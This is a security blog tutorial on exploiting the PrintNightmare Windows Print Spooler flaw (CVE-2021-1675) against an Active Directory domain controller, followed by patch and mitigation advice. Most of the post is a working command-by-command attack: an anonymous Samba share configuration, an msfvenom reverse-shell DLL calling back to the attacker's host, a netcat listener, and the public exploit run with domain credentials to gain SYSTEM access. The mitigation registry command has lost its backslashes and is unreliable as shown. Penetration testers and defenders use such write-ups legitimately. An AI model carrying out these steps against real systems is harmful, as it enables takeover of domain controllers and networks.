VK9 Security

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

by | Jul 4, 2021 | Windows Exploitation | 1 comment

Microsoft Windows could allow a remote attacker to gain elevated privileges on the system, caused by a flaw in the Print Spooler component. By persuading a victim to open specially-crafted content, an attacker could exploit this vulnerability to execute arbitrary code with higher privileges.

This service spools print (Print Spooler) jobs and handles interaction with the printer. If you turn off this service, you won’t be able to print or see your printers.

The Microsoft Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx() function, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.

The RpcAddPrinterDriverEx() function is used to install a printer driver on a system. One of the parameters to this function is the DRIVER_CONTAINER object, which contains information about which driver is to be used by the added printer.

An attacker can take advantage of the fact that any authenticated user can call RpcAddPrinterDriverEx() and specify a driver file that lives on a remote server. This results in the Print Spooler service spoolsv.exe executing code in an arbitrary DLL file with SYSTEM privileges.

Exploit code for this vulnerability that targets Active Directory domain controllers is publicly available as PrintNightmare. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB.

I will use for this demo https://github.com/cube0x0/CVE-2021-1675

Affected Products

  • Microsoft Windows Server 2008 SP2 x32
  • Microsoft Windows Server 2008 SP2 x64
  • Microsoft Windows 7 SP1 x32
  • Microsoft Windows 7 SP1 x64
  • Microsoft Windows Server 2008 R2 SP1 x64
  • Microsoft Windows Server 2012
  • Microsoft Windows 8.1 x32
  • Microsoft Windows 8.1 x64
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows RT 8.1
  • Microsoft Windows 10 x32
  • Microsoft Windows 10 x64
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019
  • Microsoft Windows 10 ARM64
  • Microsoft Windows 10 1809 for x64-based Systems
  • Microsoft Windows 10 1809 for 32-bit Systems
  • Microsoft Windows 10 1809 for ARM64-based Systems
  • Microsoft Windows 10 1607 for 32-bit Systems
  • Microsoft Windows 10 1607 for x64-based Systems
  • Microsoft Windows 10 2004 for 32-bit Systems
  • Microsoft Windows 10 2004 for ARM64-based Systems
  • Microsoft Windows 10 2004 for x64-based Systems
  • Microsoft Windows 10 1909 for 32-bit Systems
  • Microsoft Windows 10 1909 for x64-based Systems
  • Microsoft Windows 10 1909 for ARM64-based Systems
  • Microsoft Windows 10 20H2 for 32-bit Systems
  • Microsoft Windows 10 20H2 for ARM64-based Systems
  • Microsoft Windows 10 20H2 for x64-based Systems
  • Microsoft Windows Server (Server Core installation) 2019
  • Microsoft Windows Server (Server Core installation) 2004
  • Microsoft Windows Server (Server Core installation) 20H2
  • Microsoft Windows Server (Server Core installation) 2016
  • Microsoft Windows Server (Server Core installation) 2012 R2
  • Microsoft Windows Server (Server Core installation) 2012
  • Microsoft Windows Server for X64-based systems (Server Core installation) 2008 SP2
  • Microsoft Windows Server for 32-bit systems (Server Core installation) 2008 SP2
  • Microsoft Windows Server for X64-based systems (Server Core installation) 2008 R2 SP1
  • Microsoft Windows 10 21H1 for 32-bit Systems
  • Microsoft Windows 10 21H1 for ARM64-based Systems
  • Microsoft Windows 10 21H1 for x64-based Systems

For this vulnerability to work the Print Spooler needs to be enabled (Running)

Also, we would need RPC to be an open port at the server side

  • nmap -p 135 192.168.0.100

How to exploit

For this we will need a user & password for the domain controller. This is done from remote

1. Having already a shell & user credentials, we will first see if Spool service is running

  • Powershell.exe Get-Service Spool

Note: we can also use impaket tools to determine if the server is running the service

  • python3.9 /opt/impacket/examples/rpcdump.py @192.168.0.100 | grep MS-RPRN

2. Start a SMB server with anonymous log in enabled, the name of the share is going to be smb which will be hosting /tmp. First, I will edit /etc/samba/smb.conf

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
public = yes
security = user

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
writable = yes
force user = nobody
public = yes
  • sudo vi /etc/samba/smb.conf

3. Now start the SMB service

  • sudo service smbd start
  • sudo service smbd status

Note: If the service is already running just restart smbd “sudo service mbd restart

4. Now test the share, it should be with at least READ permissions

  • smbmap -H 192.168.0.13

5. In the SMB server create a DLL reverse shell, I’ll use msfvenom, locate it within the share

  • msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.13 LPORT=5555 -f dll > rev.dll
  • ls rev.dll

6. Start a netcat listener

  • nc -lvp 5555

6. Download the script (https://github.com/cube0x0/CVE-2021-1675), I’ll place it in /tmp

  • cd /tmp
  • git clone https://github.com/cube0x0/CVE-2021-1675.git

6. Run the script to see its options

  • cd /tmp/CVE-2021-1675
  • python3.9 CVE-2021-1675.py

Note: Before running the script you may need to install the version for impacket for this script to work

  • sudo apt remove --purge impacket-scripts python3-impacket
  • sudo apt autoremove
  • pip3 uninstall impacket
  • git clone https://github.com/cube0x0/impacket #you can also use https://github.com/SecureAuthCorp/impacket
  • cd impacket
  • pip install .
  • sudo python3 ./setup.py install

7. Run the script using the domain controller IP / username / password / SMB reverse shell path

  • python3 ./CVE-2021-1675.py vk9-sec.com/user1:Password1@192.168.0.100 '\\192.168.0.13\smb\rev.dll'

Note: In my case it seems to error, but the payload gets executed

8. Now check the netcat listener, we should have a session with NT Authority System rights

  • whoami

Extra

1. The user I used to exploit this vulnerability has only Domain Users rights

  • net user user1

Remedy

Use Microsoft Automatic Update to apply the appropriate patch for your system, or the Microsoft Security Update Guide to search for available patches.

Alternative: This vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.

Mitigation

Disable Spooler service

Powershell

  • Stop-Service Spooler -Force
  • Set-Service -Name Spooler -StartupType Disabled

Registry

  • REG ADD "HKLMSYSTEMCurrentControlSetServicesSpooler" /v "Start" /t REG_DWORD /d "4" /f

(Alternative) Uninstall Print-Services

  • Uninstall-WindowsFeature Print-Services

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/202477

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675

https://github.com/cube0x0/CVE-2021-1675

https://www.kb.cert.org/vuls/id/383432

https://github.com/afwu/PrintNightmare

https://github.com/LaresLLC/CVE-2021-1675

https://github.com/calebstewart/CVE-2021-1675

https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/

https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/

1 Comment

Submit a Comment